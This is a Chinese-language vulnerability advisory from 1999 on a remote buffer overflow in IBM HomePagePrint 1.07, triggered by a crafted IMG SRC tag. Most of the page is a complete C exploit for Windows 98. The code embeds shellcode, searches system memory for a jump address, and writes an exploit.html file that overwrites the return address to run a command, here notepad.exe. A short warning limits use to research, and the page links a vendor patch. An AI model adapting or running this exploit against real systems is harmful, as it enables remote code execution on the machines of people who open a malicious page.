首页 -> 安全研究
安全研究
安全漏洞
IBM HomePagePrint 溢出漏洞
发布日期:1999-11-02
更新日期:1999-11-02
受影响系统:
IBM HomePagePrint 1.07描述:
某些版本的IBM Web页打印输出软件"IBM HomePagePrint”可以被恶意webservers造成远程溢出。如果一个包含特殊构造的IMG SRC tag通过IBM HomePagePrint 软件被浏览或打印,可以在客户端执行任意代码。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*=============================================================================
IBM HomePagePrint Version 1.0.7 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <windows.h>
#define EXPLOIT_HTML "exploit.html"
#define HOST_ADDR "http://www.geocities.co.jp/SiliconValley-SanJose/7479/"
#define EIP 990
#define JMPS_CODE 0xe9
#define JMPS_OFS 0xfffff790
unsigned int mems[]={
0xbfb70000,0xbfbfc000,
0xbfde0000,0xbfde6000,
0xbfdf0000,0xbfdf5000,
0xbfe00000,0xbfe10000,
0xbfe30000,0xbfe43000,
0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,
0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,
0xbff20000,0xbff47000,
0xbff50000,0xbff61000,
0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,
0,0};
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";
unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
unsigned int adr;
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2){
adr=(unsigned int)p;
if ((adr&0xff)==0) continue;
if (((adr>>8)&0xff)==0) continue;
if (((adr>>16)&0xff)==0) continue;
if (((adr>>24)&0xff)==0) continue;
return(adr);
}
return(0);
}
int PASCAL WinMain(HINSTANCE hInst, HINSTANCE hInstPrev, LPSTR pszCmdLine, int CmdShow)
{
FILE *fp;
unsigned int i,ip,eip;
static unsigned char buf[30000];
if ((fp=fopen(EXPLOIT_HTML,"wb"))==NULL) return FALSE;
fprintf(fp,"<HTML><IMG SRC=\"");
memset(buf,'a',2000); buf[2000]=0;
for (i=0;i<50;i++) buf[i]=0x90;
strcat(exploit_code,cmdbuf);
memcpy(buf+50,exploit_code,strlen(exploit_code));
for (i=0;;i+=2){
if (mems[i]==0) return FALSE;
if ((ip=search_mem(fp,(unsigned char *)mems[i],
(unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
}
eip=EIP-strlen(HOST_ADDR);
buf[eip ]=ip&0xff;
buf[eip+1]=(ip>>8)&0xff;
buf[eip+2]=(ip>>16)&0xff;
buf[eip+3]=(ip>>24)&0xff;
ip=JMPS_OFS;
buf[eip+4]=JMPS_CODE;
buf[eip+5]=ip&0xff;
buf[eip+6]=(ip>>8)&0xff;
buf[eip+7]=(ip>>16)&0xff;
buf[eip+8]=(ip>>24)&0xff;
fwrite(buf,2000,1,fp);
fprintf(fp,"\"></HTML>");
fclose(fp);
return FALSE;
}
建议:
补丁文件:
http://www.ibm.co.jp/software/internet/hpgprt/down2.html
浏览次数:7661
严重程度:0(网友投票)
绿盟科技给您安全的保障